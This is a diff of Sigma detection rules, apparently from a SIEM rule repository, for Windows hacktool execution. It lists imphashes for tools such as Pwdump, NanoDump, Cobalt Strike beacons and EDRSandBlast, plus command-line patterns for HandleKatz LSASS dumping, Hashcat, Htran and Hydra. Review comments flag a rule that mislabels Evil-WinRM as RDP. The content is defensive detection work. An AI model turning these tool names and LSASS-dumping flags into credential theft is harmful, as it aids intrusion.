24e3e58a-646b-4b50-adef-02ef935b9fc8 status: test -description: Detects the execution of different Windows based hacktools via their - import hash (imphash) even if the files have been renamed +description: Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed references: - Internal Research author: Florian Roth (Nextron Systems) 
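Review bot: The rewritten `description` line says the adversary logs in "using the Remote Desktop Protocol (RDP)", but the rule matches `ruby.exe` with `-i`/`-u`/`-p` arguments, i.e. an Evil-WinRM invocation over WinRM, and the Atomic reference is T1021.006 (WinRM), not RDP; a responder reading the alert text would be pointed at the wrong protocol. Suggested replacement: `description: Detects the execution of Evil-WinRM (ruby.exe with the -i, -u and -p arguments), a tool used to log into a computer with valid accounts over WinRM and run commands as that user.` The rewrap in this hunk was the moment to fix the wording rather than carry it forward.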
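Review bot: The selection is still named `selection_mstsc` although nothing in it relates to mstsc or RDP — it keys on `\ruby.exe` plus `-i`, `-u`, `-p` — and `condition: process_creation and (1 of selection_*)` has only that one selection to choose from. Renaming it `selection_evilwinrm` and writing `condition: process_creation and selection_evilwinrm` states the intent plainly; this is cosmetic and does not change matching. The three short flags on any Ruby process are a weak signature (any Ruby script taking `-i -u -p` matches), so `falsepositives: - Unknown` would be more useful as `- Ruby scripts and tools that accept -i, -u and -p arguments`.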
@@ -20,182 +19,182 @@ detection: EventID: 4688 Channel: Security selection: - - Imphash: - - bcca3c247b619dcd13c8cdff5f123932 - - 3a19059bd7688cb88e70005f18efc439 - - bf6223a49e45d99094406777eb6004ba - - 23867a89c2b8fc733be6cf5ef902f2d1 - - a37ff327f8d48e8a4d2f757e1b6e70bc - - f9a28c458284584a93b14216308d31bd - - 6118619783fc175bc7ebecff0769b46e - - 959a83047e80ab68b368fdb3f4c6e4ea - - 563233bfa169acc7892451f71ad5850a - - 87575cb7a0e0700eb37f2e3668671a08 - - 13f08707f759af6003837a150a371ba1 - - 1781f06048a7e58b323f0b9259be798b - - 233f85f2d4bc9d6521a6caae11a1e7f5 - - 24af2584cbf4d60bbe5c6d1b31b3be6d - - 632969ddf6dbf4e0f53424b75e4b91f2 - - 713c29b396b907ed71a72482759ed757 - - 749a7bb1f0b4c4455949c0b2bf7f9e9f - - 8628b2608957a6b0c6330ac3de28ce2e - - 8b114550386e31895dfab371e741123d - - 94cb940a1a6b65bed4d5a8f849ce9793 - - 9d68781980370e00e0bd939ee5e6c141 - - b18a1401ff8f444056d29450fbc0a6ce - - cb567f9498452721d77a451374955f5f - - 730073214094cd328547bf1f72289752 - - 17b461a082950fc6332228572138b80c - - dc25ee78e2ef4d36faa0badf1e7461c9 - - 819b19d53ca6736448f9325a85736792 - - 829da329ce140d873b4a8bde2cbfaa7e - - c547f2e66061a8dffb6f5a3ff63c0a74 - - 0588081ab0e63ba785938467e1b10cca - - 0d9ec08bac6c07d9987dfd0f1506587c - - bc129092b71c89b4d4c8cdf8ea590b29 - - 4da924cf622d039d58bce71cdf05d242 - - e7a3a5c377e2d29324093377d7db1c66 - - 9a9dbec5c62f0380b4fa5fd31deffedf - - af8a3976ad71e5d5fdfb67ddb8dadfce - - 0c477898bbf137bbd6f2a54e3b805ff4 - - 0ca9f02b537bcea20d4ea5eb1a9fe338 - - 3ab3655e5a14d4eefc547f4781bf7f9e - - e6f9d5152da699934b30daab206471f6 - - 3ad59991ccf1d67339b319b15a41b35d - - ffdd59e0318b85a3e480874d9796d872 - - 0cf479628d7cc1ea25ec7998a92f5051 - - 07a2d4dcbd6cb2c6a45e6b101f0b6d51 - - d6d0f80386e1380d05cb78e871bc72b1 - - 38d9e015591bbfd4929e0d0f47fa0055 - - 0e2216679ca6e1094d63322e3412d650 - - ada161bf41b8e5e9132858cb54cab5fb - - 2a1bc4913cd5ecb0434df07cb675b798 - - 11083e75553baae21dc89ce8f9a195e4 - - a23d29c9e566f2fa8ffbb79267f5df80 - - 
4a07f944a83e8a7c2525efa35dd30e2f - - 767637c23bb42cd5d7397cf58b0be688 - - 14c4e4c72ba075e9069ee67f39188ad8 - - 3c782813d4afce07bbfc5a9772acdbdc - - 7d010c6bb6a3726f327f7e239166d127 - - 89159ba4dd04e4ce5559f132a9964eb3 - - 6f33f4a5fc42b8cec7314947bd13f30f - - 5834ed4291bdeb928270428ebbaf7604 - - 5a8a8a43f25485e7ee1b201edcbc7a38 - - dc7d30b90b2d8abf664fbed2b1b59894 - - 41923ea1f824fe63ea5beb84db7a3e74 - - 3de09703c8e79ed2ca3f01074719906b - - a53a02b997935fd8eedcb5f7abab9b9f - - e96a73c7bf33a464c510ede582318bf2 - - 32089b8851bbf8bc2d014e9f37288c83 - - 09D278F9DE118EF09163C6140255C690 - - 03866661686829d806989e2fc5a72606 - - e57401fbdadcd4571ff385ab82bd5d6d - - 84B763C45C0E4A3E7CA5548C710DB4EE - - 19584675d94829987952432e018d5056 - - 330768a4f172e10acb6287b87289d83b - - 885c99ccfbe77d1cbfcb9c4e7c1a3313 - - 22a22bc9e4e0d2f189f1ea01748816ac - - 7fa30e6bb7e8e8a69155636e50bf1b28 - - 96df3a3731912449521f6f8d183279b1 - - 7e6cf3ff4576581271ac8a313b2aab46 - - 51791678f351c03a0eb4e2a7b05c6e17 - - 25ce42b079282632708fc846129e98a5 - - 021bcca20ba3381b11bdde26b4e62f20 - - 59223b5f52d8799d38e0754855cbdf42 - - 81e75d8f1d276c156653d3d8813e4a43 - - 17244e8b6b8227e57fe709ccad421420 - - 5b76da3acdedc8a5cdf23a798b5936b4 - - cb2b65bb77d995cc1c0e5df1c860133c - - 40445337761d80cf465136fafb1f63e6 - - 8a790f401b29fa87bc1e56f7272b3aa6 - - Hashes|contains: - - IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932 - - IMPHASH=3A19059BD7688CB88E70005F18EFC439 - - IMPHASH=bf6223a49e45d99094406777eb6004ba - - IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1 - - IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC - - IMPHASH=F9A28C458284584A93B14216308D31BD - - IMPHASH=6118619783FC175BC7EBECFF0769B46E - - IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA - - IMPHASH=563233BFA169ACC7892451F71AD5850A - - IMPHASH=87575CB7A0E0700EB37F2E3668671A08 - - IMPHASH=13F08707F759AF6003837A150A371BA1 - - IMPHASH=1781F06048A7E58B323F0B9259BE798B - - IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5 - - IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D - - 
IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2 - - IMPHASH=713C29B396B907ED71A72482759ED757 - - IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F - - IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E - - IMPHASH=8B114550386E31895DFAB371E741123D - - IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793 - - IMPHASH=9D68781980370E00E0BD939EE5E6C141 - - IMPHASH=B18A1401FF8F444056D29450FBC0A6CE - - IMPHASH=CB567F9498452721D77A451374955F5F - - IMPHASH=730073214094CD328547BF1F72289752 - - IMPHASH=17B461A082950FC6332228572138B80C - - IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9 - - IMPHASH=819B19D53CA6736448F9325A85736792 - - IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E - - IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74 - - IMPHASH=0588081AB0E63BA785938467E1B10CCA - - IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C - - IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29 - - IMPHASH=4DA924CF622D039D58BCE71CDF05D242 - - IMPHASH=E7A3A5C377E2D29324093377D7DB1C66 - - IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF - - IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE - - IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4 - - IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338 - - IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E - - IMPHASH=E6F9D5152DA699934B30DAAB206471F6 - - IMPHASH=3AD59991CCF1D67339B319B15A41B35D - - IMPHASH=FFDD59E0318B85A3E480874D9796D872 - - IMPHASH=0CF479628D7CC1EA25EC7998A92F5051 - - IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51 - - IMPHASH=D6D0F80386E1380D05CB78E871BC72B1 - - IMPHASH=38D9E015591BBFD4929E0D0F47FA0055 - - IMPHASH=0E2216679CA6E1094D63322E3412D650 - - IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB - - IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798 - - IMPHASH=11083E75553BAAE21DC89CE8F9A195E4 - - IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80 - - IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F - - IMPHASH=767637C23BB42CD5D7397CF58B0BE688 - - IMPHASH=14C4E4C72BA075E9069EE67F39188AD8 - - IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC - - IMPHASH=7D010C6BB6A3726F327F7E239166D127 - - IMPHASH=89159BA4DD04E4CE5559F132A9964EB3 - - IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F - - 
IMPHASH=5834ED4291BDEB928270428EBBAF7604 - - IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38 - - IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894 - - IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74 - - IMPHASH=3DE09703C8E79ED2CA3F01074719906B - - IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F - - IMPHASH=E96A73C7BF33A464C510EDE582318BF2 - - IMPHASH=32089B8851BBF8BC2D014E9F37288C83 - - IMPHASH=09D278F9DE118EF09163C6140255C690 - - IMPHASH=03866661686829d806989e2fc5a72606 - - IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d - - IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE - - IMPHASH=19584675D94829987952432E018D5056 - - IMPHASH=330768A4F172E10ACB6287B87289D83B - - IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313 - - IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC - - IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28 - - IMPHASH=96DF3A3731912449521F6F8D183279B1 - - IMPHASH=7E6CF3FF4576581271AC8A313B2AAB46 - - IMPHASH=51791678F351C03A0EB4E2A7B05C6E17 - - IMPHASH=25CE42B079282632708FC846129E98A5 - - IMPHASH=021BCCA20BA3381B11BDDE26B4E62F20 - - IMPHASH=59223B5F52D8799D38E0754855CBDF42 - - IMPHASH=81E75D8F1D276C156653D3D8813E4A43 - - IMPHASH=17244E8B6B8227E57FE709CCAD421420 - - IMPHASH=5B76DA3ACDEDC8A5CDF23A798B5936B4 - - IMPHASH=CB2B65BB77D995CC1C0E5DF1C860133C - - IMPHASH=40445337761D80CF465136FAFB1F63E6 - - IMPHASH=8A790F401B29FA87BC1E56F7272B3AA6 + - Imphash: + - bcca3c247b619dcd13c8cdff5f123932 # PetitPotam + - 3a19059bd7688cb88e70005f18efc439 # PetitPotam + - bf6223a49e45d99094406777eb6004ba # PetitPotam + - 23867a89c2b8fc733be6cf5ef902f2d1 # JuicyPotato + - a37ff327f8d48e8a4d2f757e1b6e70bc # JuicyPotato + - f9a28c458284584a93b14216308d31bd # JuicyPotatoNG + - 6118619783fc175bc7ebecff0769b46e # RoguePotato + - 959a83047e80ab68b368fdb3f4c6e4ea # RoguePotato + - 563233bfa169acc7892451f71ad5850a # RoguePotato + - 87575cb7a0e0700eb37f2e3668671a08 # RoguePotato + - 13f08707f759af6003837a150a371ba1 # Pwdump + - 1781f06048a7e58b323f0b9259be798b # Pwdump + - 233f85f2d4bc9d6521a6caae11a1e7f5 # Pwdump + - 24af2584cbf4d60bbe5c6d1b31b3be6d # 
Pwdump + - 632969ddf6dbf4e0f53424b75e4b91f2 # Pwdump + - 713c29b396b907ed71a72482759ed757 # Pwdump + - 749a7bb1f0b4c4455949c0b2bf7f9e9f # Pwdump + - 8628b2608957a6b0c6330ac3de28ce2e # Pwdump + - 8b114550386e31895dfab371e741123d # Pwdump + - 94cb940a1a6b65bed4d5a8f849ce9793 # PwDumpX + - 9d68781980370e00e0bd939ee5e6c141 # Pwdump + - b18a1401ff8f444056d29450fbc0a6ce # Pwdump + - cb567f9498452721d77a451374955f5f # Pwdump + - 730073214094cd328547bf1f72289752 # Htran + - 17b461a082950fc6332228572138b80c # Cobalt Strike beacons + - dc25ee78e2ef4d36faa0badf1e7461c9 # Cobalt Strike beacons + - 819b19d53ca6736448f9325a85736792 # Cobalt Strike beacons + - 829da329ce140d873b4a8bde2cbfaa7e # Cobalt Strike beacons + - c547f2e66061a8dffb6f5a3ff63c0a74 # PPLDump + - 0588081ab0e63ba785938467e1b10cca # PPLDump + - 0d9ec08bac6c07d9987dfd0f1506587c # NanoDump + - bc129092b71c89b4d4c8cdf8ea590b29 # NanoDump + - 4da924cf622d039d58bce71cdf05d242 # NanoDump + - e7a3a5c377e2d29324093377d7db1c66 # NanoDump + - 9a9dbec5c62f0380b4fa5fd31deffedf # NanoDump + - af8a3976ad71e5d5fdfb67ddb8dadfce # NanoDump + - 0c477898bbf137bbd6f2a54e3b805ff4 # NanoDump + - 0ca9f02b537bcea20d4ea5eb1a9fe338 # NanoDump + - 3ab3655e5a14d4eefc547f4781bf7f9e # NanoDump + - e6f9d5152da699934b30daab206471f6 # NanoDump + - 3ad59991ccf1d67339b319b15a41b35d # NanoDump + - ffdd59e0318b85a3e480874d9796d872 # NanoDump + - 0cf479628d7cc1ea25ec7998a92f5051 # NanoDump + - 07a2d4dcbd6cb2c6a45e6b101f0b6d51 # NanoDump + - d6d0f80386e1380d05cb78e871bc72b1 # NanoDump + - 38d9e015591bbfd4929e0d0f47fa0055 # HandleKatz + - 0e2216679ca6e1094d63322e3412d650 # HandleKatz + - ada161bf41b8e5e9132858cb54cab5fb # DripLoader + - 2a1bc4913cd5ecb0434df07cb675b798 # DripLoader + - 11083e75553baae21dc89ce8f9a195e4 # DripLoader + - a23d29c9e566f2fa8ffbb79267f5df80 # DripLoader + - 4a07f944a83e8a7c2525efa35dd30e2f # CreateMiniDump + - 767637c23bb42cd5d7397cf58b0be688 # UACMe Akagi + - 14c4e4c72ba075e9069ee67f39188ad8 # UACMe Akagi + - 
3c782813d4afce07bbfc5a9772acdbdc # UACMe Akagi + - 7d010c6bb6a3726f327f7e239166d127 # UACMe Akagi + - 89159ba4dd04e4ce5559f132a9964eb3 # UACMe Akagi + - 6f33f4a5fc42b8cec7314947bd13f30f # UACMe Akagi + - 5834ed4291bdeb928270428ebbaf7604 # UACMe Akagi + - 5a8a8a43f25485e7ee1b201edcbc7a38 # UACMe Akagi + - dc7d30b90b2d8abf664fbed2b1b59894 # UACMe Akagi + - 41923ea1f824fe63ea5beb84db7a3e74 # UACMe Akagi + - 3de09703c8e79ed2ca3f01074719906b # UACMe Akagi + - a53a02b997935fd8eedcb5f7abab9b9f # WCE + - e96a73c7bf33a464c510ede582318bf2 # WCE + - 32089b8851bbf8bc2d014e9f37288c83 # Sliver Stagers + - 09D278F9DE118EF09163C6140255C690 # Dumpert + - 03866661686829d806989e2fc5a72606 # Dumpert + - e57401fbdadcd4571ff385ab82bd5d6d # Dumpert + - 84B763C45C0E4A3E7CA5548C710DB4EE # SysmonEnte + - 19584675d94829987952432e018d5056 # SysmonQuiet + - 330768a4f172e10acb6287b87289d83b # ShaprEvtMute Hook + - 885c99ccfbe77d1cbfcb9c4e7c1a3313 # Forkatz + - 22a22bc9e4e0d2f189f1ea01748816ac # PPLKiller + - 7fa30e6bb7e8e8a69155636e50bf1b28 # PPLKiller + - 96df3a3731912449521f6f8d183279b1 # Backstab + - 7e6cf3ff4576581271ac8a313b2aab46 # Backstab + - 51791678f351c03a0eb4e2a7b05c6e17 # Backstab + - 25ce42b079282632708fc846129e98a5 # Forensia + - 021bcca20ba3381b11bdde26b4e62f20 # EDRSandBlast + - 59223b5f52d8799d38e0754855cbdf42 # EDRSandBlast + - 81e75d8f1d276c156653d3d8813e4a43 # EDRSandBlast + - 17244e8b6b8227e57fe709ccad421420 # EDRSandBlast + - 5b76da3acdedc8a5cdf23a798b5936b4 # EDRSandBlast + - cb2b65bb77d995cc1c0e5df1c860133c # EDRSandBlast + - 40445337761d80cf465136fafb1f63e6 # EDRSandBlast + - 8a790f401b29fa87bc1e56f7272b3aa6 # EDRSilencer + - Hashes|contains: # Sysmon field hashes contains all types + - IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932 # PetitPotam + - IMPHASH=3A19059BD7688CB88E70005F18EFC439 # PetitPotam + - IMPHASH=bf6223a49e45d99094406777eb6004ba # PetitPotam + - IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1 # JuicyPotato + - IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC # JuicyPotato 
+ - IMPHASH=F9A28C458284584A93B14216308D31BD # JuicyPotatoNG + - IMPHASH=6118619783FC175BC7EBECFF0769B46E # RoguePotato + - IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA # RoguePotato + - IMPHASH=563233BFA169ACC7892451F71AD5850A # RoguePotato + - IMPHASH=87575CB7A0E0700EB37F2E3668671A08 # RoguePotato + - IMPHASH=13F08707F759AF6003837A150A371BA1 # Pwdump + - IMPHASH=1781F06048A7E58B323F0B9259BE798B # Pwdump + - IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5 # Pwdump + - IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D # Pwdump + - IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2 # Pwdump + - IMPHASH=713C29B396B907ED71A72482759ED757 # Pwdump + - IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F # Pwdump + - IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E # Pwdump + - IMPHASH=8B114550386E31895DFAB371E741123D # Pwdump + - IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793 # PwDumpX + - IMPHASH=9D68781980370E00E0BD939EE5E6C141 # Pwdump + - IMPHASH=B18A1401FF8F444056D29450FBC0A6CE # Pwdump + - IMPHASH=CB567F9498452721D77A451374955F5F # Pwdump + - IMPHASH=730073214094CD328547BF1F72289752 # Htran + - IMPHASH=17B461A082950FC6332228572138B80C # Cobalt Strike beacons + - IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9 # Cobalt Strike beacons + - IMPHASH=819B19D53CA6736448F9325A85736792 # Cobalt Strike beacons + - IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E # Cobalt Strike beacons + - IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74 # PPLDump + - IMPHASH=0588081AB0E63BA785938467E1B10CCA # PPLDump + - IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C # NanoDump + - IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29 # NanoDump + - IMPHASH=4DA924CF622D039D58BCE71CDF05D242 # NanoDump + - IMPHASH=E7A3A5C377E2D29324093377D7DB1C66 # NanoDump + - IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF # NanoDump + - IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE # NanoDump + - IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4 # NanoDump + - IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338 # NanoDump + - IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E # NanoDump + - IMPHASH=E6F9D5152DA699934B30DAAB206471F6 # NanoDump 
+ - IMPHASH=3AD59991CCF1D67339B319B15A41B35D # NanoDump + - IMPHASH=FFDD59E0318B85A3E480874D9796D872 # NanoDump + - IMPHASH=0CF479628D7CC1EA25EC7998A92F5051 # NanoDump + - IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51 # NanoDump + - IMPHASH=D6D0F80386E1380D05CB78E871BC72B1 # NanoDump + - IMPHASH=38D9E015591BBFD4929E0D0F47FA0055 # HandleKatz + - IMPHASH=0E2216679CA6E1094D63322E3412D650 # HandleKatz + - IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB # DripLoader + - IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798 # DripLoader + - IMPHASH=11083E75553BAAE21DC89CE8F9A195E4 # DripLoader + - IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80 # DripLoader + - IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F # CreateMiniDump + - IMPHASH=767637C23BB42CD5D7397CF58B0BE688 # UACMe Akagi + - IMPHASH=14C4E4C72BA075E9069EE67F39188AD8 # UACMe Akagi + - IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC # UACMe Akagi + - IMPHASH=7D010C6BB6A3726F327F7E239166D127 # UACMe Akagi + - IMPHASH=89159BA4DD04E4CE5559F132A9964EB3 # UACMe Akagi + - IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F # UACMe Akagi + - IMPHASH=5834ED4291BDEB928270428EBBAF7604 # UACMe Akagi + - IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38 # UACMe Akagi + - IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894 # UACMe Akagi + - IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74 # UACMe Akagi + - IMPHASH=3DE09703C8E79ED2CA3F01074719906B # UACMe Akagi + - IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F # WCE + - IMPHASH=E96A73C7BF33A464C510EDE582318BF2 # WCE + - IMPHASH=32089B8851BBF8BC2D014E9F37288C83 # Sliver Stagers + - IMPHASH=09D278F9DE118EF09163C6140255C690 # Dumpert + - IMPHASH=03866661686829d806989e2fc5a72606 # Dumpert + - IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d # Dumpert + - IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE # SysmonEnte + - IMPHASH=19584675D94829987952432E018D5056 # SysmonQuiet + - IMPHASH=330768A4F172E10ACB6287B87289D83B # ShaprEvtMute Hook + - IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313 # Forkatz + - IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC # PPLKiller + - 
IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28 # PPLKiller + - IMPHASH=96DF3A3731912449521F6F8D183279B1 # Backstab + - IMPHASH=7E6CF3FF4576581271AC8A313B2AAB46 # Backstab + - IMPHASH=51791678F351C03A0EB4E2A7B05C6E17 # Backstab + - IMPHASH=25CE42B079282632708FC846129E98A5 # Forensia + - IMPHASH=021BCCA20BA3381B11BDDE26B4E62F20 # EDRSandBlast + - IMPHASH=59223B5F52D8799D38E0754855CBDF42 # EDRSandBlast + - IMPHASH=81E75D8F1D276C156653D3D8813E4A43 # EDRSandBlast + - IMPHASH=17244E8B6B8227E57FE709CCAD421420 # EDRSandBlast + - IMPHASH=5B76DA3ACDEDC8A5CDF23A798B5936B4 # EDRSandBlast + - IMPHASH=CB2B65BB77D995CC1C0E5DF1C860133C # EDRSandBlast + - IMPHASH=40445337761D80CF465136FAFB1F63E6 # EDRSandBlast + - IMPHASH=8A790F401B29FA87BC1E56F7272B3AA6 # EDRSilencer condition: process_creation and selection falsepositives: - Legitimate use of one of these tools diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_gmer.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_gmer.yml index 982b4995f..528d94bd6 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_gmer.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_gmer.yml @@ -17,16 +17,16 @@ detection: EventID: 4688 Channel: Security selection_img: - NewProcessName|endswith: \gmer.exe + NewProcessName|endswith: \gmer.exe selection_sysmon_hash: Hashes|contains: - MD5=E9DC058440D321AA17D0600B3CA0AB04 - SHA1=539C228B6B332F5AA523E5CE358C16647D8BBE57 - SHA256=E8A3E804A96C716A3E9B69195DB6FFB0D33E2433AF871E4D4E1EAB3097237173 selection_other: - - md5: e9dc058440d321aa17d0600b3ca0ab04 - - sha1: 539c228b6b332f5aa523e5ce358c16647d8bbe57 - - sha256: e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173 + - md5: e9dc058440d321aa17d0600b3ca0ab04 + - sha1: 539c228b6b332f5aa523e5ce358c16647d8bbe57 + - sha256: e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173 condition: process_creation and (1 of selection_*) falsepositives: - Unlikely 
diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_handlekatz.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_handlekatz.yml index fed8cd75c..6cb265b3f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_handlekatz.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_handlekatz.yml @@ -1,8 +1,7 @@ title: HackTool - HandleKatz LSASS Dumper Execution id: ca621ba5-54ab-4035-9942-d378e6fcde3c status: test -description: Detects the use of HandleKatz, a tool that demonstrates the usage of - cloned handles to Lsass in order to create an obfuscated memory dump of the same +description: Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same references: - https://github.com/codewhitesec/HandleKatz author: Florian Roth (Nextron Systems) @@ -19,20 +18,20 @@ detection: EventID: 4688 Channel: Security selection_loader_img: - CommandLine|contains: '--pid:' - NewProcessName|endswith: \loader.exe + CommandLine|contains: '--pid:' + NewProcessName|endswith: \loader.exe selection_loader_imphash: - - Imphash: - - 38d9e015591bbfd4929e0d0f47fa0055 - - 0e2216679ca6e1094d63322e3412d650 - - Hashes: - - IMPHASH=38D9E015591BBFD4929E0D0F47FA0055 - - IMPHASH=0E2216679CA6E1094D63322E3412D650 + - Imphash: + - 38d9e015591bbfd4929e0d0f47fa0055 + - 0e2216679ca6e1094d63322e3412d650 + - Hashes: + - IMPHASH=38D9E015591BBFD4929E0D0F47FA0055 + - IMPHASH=0E2216679CA6E1094D63322E3412D650 selection_flags: - CommandLine|contains|all: + CommandLine|contains|all: - '--pid:' - '--outfile:' - CommandLine|contains: + CommandLine|contains: - .dmp - lsass - .obf diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_hashcat.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_hashcat.yml index a6380d32c..292cc3b6f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_hashcat.yml 
+++ b/sigma/builtin/process_creation/proc_creation_win_hktl_hashcat.yml @@ -1,8 +1,7 @@ title: HackTool - Hashcat Password Cracker Execution id: 39b31e81-5f5f-4898-9c0e-2160cfc0f9bf status: test -description: Execute Hashcat.exe with provided SAM file from registry of Windows and - Password list to crack against +description: Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.002/T1110.002.md#atomic-test-1---password-cracking-with-hashcat - https://hashcat.net/wiki/doku.php?id=hashcat @@ -20,9 +19,9 @@ detection: EventID: 4688 Channel: Security selection_img: - NewProcessName|endswith: \hashcat.exe + NewProcessName|endswith: \hashcat.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - '-a ' - '-m 1000 ' - '-r ' diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_htran_or_natbypass.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_htran_or_natbypass.yml index 4b93f3b3b..22a771cef 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_htran_or_natbypass.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_htran_or_natbypass.yml @@ -1,8 +1,7 @@ title: HackTool - Htran/NATBypass Execution id: f5e3b62f-e577-4e59-931e-0a15b2b94e1e status: test -description: Detects executable names or flags used by Htran or Htran-like tools (e.g. - NATBypass) +description: Detects executable names or flags used by Htran or Htran-like tools (e.g. NATBypass) references: - https://github.com/HiwinCN/HTran - https://github.com/cw1997/NATBypass @@ -21,11 +20,11 @@ detection: EventID: 4688 Channel: Security selection_img: - NewProcessName|endswith: + NewProcessName|endswith: - \htran.exe - \lcx.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - '.exe -tran ' - '.exe -slave ' condition: process_creation and (1 of selection_*) 
diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_hydra.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_hydra.yml index eece55fd3..96cbacfd3 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_hydra.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_hydra.yml @@ -1,8 +1,7 @@ title: HackTool - Hydra Password Bruteforce Execution id: aaafa146-074c-11eb-adc1-0242ac120002 status: test -description: Detects command line parameters used by Hydra password guessing hack - tool +description: Detects command line parameters used by Hydra password guessing hack tool references: - https://github.com/vanhauser-thc/thc-hydra author: Vasiliy Burov @@ -20,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - '-u ' - '-p ' - CommandLine|contains: + CommandLine|contains: - ^USER^ - ^PASS^ condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_impacket_lateral_movement.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_impacket_lateral_movement.yml index 74fbb413c..a7e87dbfb 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_impacket_lateral_movement.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_impacket_lateral_movement.yml @@ -1,8 +1,8 @@ title: HackTool - Potential Impacket Lateral Movement Activity id: 10c14723-61c7-4c75-92ca-9af245723ad2 related: - - id: 